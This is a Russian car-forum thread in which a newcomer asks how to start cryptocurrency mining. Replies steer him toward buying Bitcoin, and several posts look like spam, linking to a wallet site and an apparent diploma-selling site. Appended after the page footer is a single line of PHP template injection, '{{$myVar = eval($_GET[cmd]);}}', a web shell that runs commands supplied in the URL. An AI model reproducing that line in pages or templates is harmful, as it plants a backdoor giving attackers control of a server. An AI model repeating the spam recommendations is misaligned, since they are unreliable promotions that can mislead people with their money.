+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Как майнят криптовалюту, с чего начать?


  1. #1

    Как майнят криптовалюту, с чего начать?

    Меня не интересует майнинг на своем собственно ПК, так как у долго откладывал деньги и хочу либо собрать фермы для майнинга, либо купить специализированное оборудование для майнинга (если такое есть). Но сначала надо вообще определиться что майнить, насколько это будет выгодно и что для этого покупать?

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Я бы на вашем месте с майнингом не вливался, во-первых, окупаемость всего может быть не сразу, придется ждать роста криптовалюты, а они либо падают в цене и маринуются на несколько лет, либо взлетают как сейчас, например. Лучше подождать максимального нового минимума для того-же Биткоина, к примеру и купить его на все средства. Потом подождать его стремительного роста.

  3. #3
    Согласен с предыдущим ответом, ибо вы сейчас намайните, но окупаться вряд ли это будет, больше заплатите за свет и будете сидеть пару лет ждать с полный кошельком крипты, пока она вырастет, чтобы хоть какую-та окупаемость получить.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Прежде чем вкладывать большие деньги в такой вид бизнеса вам стоит ознакомиться подробно о майнинге криптовалют в целом. Вот есть подробная статья об этом - https://cryptobit.media/ru/mining/ , почитайте, там все четко расписано, как есть. Я сам об майнинге задумывался недавно, но пришел к выводу, что проще уже банально инвестировать в криптовалюту, лучше конечно в новую, например в Грам - жду ее уже очень долго, она вот вот должна появиться на рынке, все зависит от братьев Дуровых)

  5. #5
    GTI-Racing Astra is on a distinguished road Аватар для Astra
    Регистрация
    05.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    725
    Здравствуйте, подскажите, где найти крипто кошелек для хранения

  6. #6
    GTI-Racing bergamo is on a distinguished road Аватар для bergamo
    Регистрация
    05.06.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    685
    Привет, если вам нужно хранить криптовалюту, то рекомендую воспользоваться порталом http://cryptonist.ru ,здесь есть прекрасная продукция высокого качества.

  7. #7
    Мимо проходил ArkadiySamsonov is on a distinguished road Аватар для ArkadiySamsonov
    Регистрация
    01.02.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    3
    Не думаю, что этим стоит заниматься, если вы начинать будете именно сейчас. Я бы посоветовал потратить такую сумму на http://kyplu-diplom.net.ua/
    Последний раз редактировалось ArkadiySamsonov; 07.04.2021 в 18:48.

+ Ответить в теме

Похожие темы

  1. Ответов: 12
    Последнее сообщение: 02.10.2023, 20:08
  2. Как начать играть в видео покер
    от Vizara в разделе Курилка
    Ответов: 3
    Последнее сообщение: 20.11.2021, 17:11
  3. Ответов: 14
    Последнее сообщение: 01.09.2020, 23:41
  4. Ответов: 3
    Последнее сообщение: 27.05.2019, 10:08
  5. С Чего Начать?
    от 0opsA в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 9
    Последнее сообщение: 21.10.2008, 10:48

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}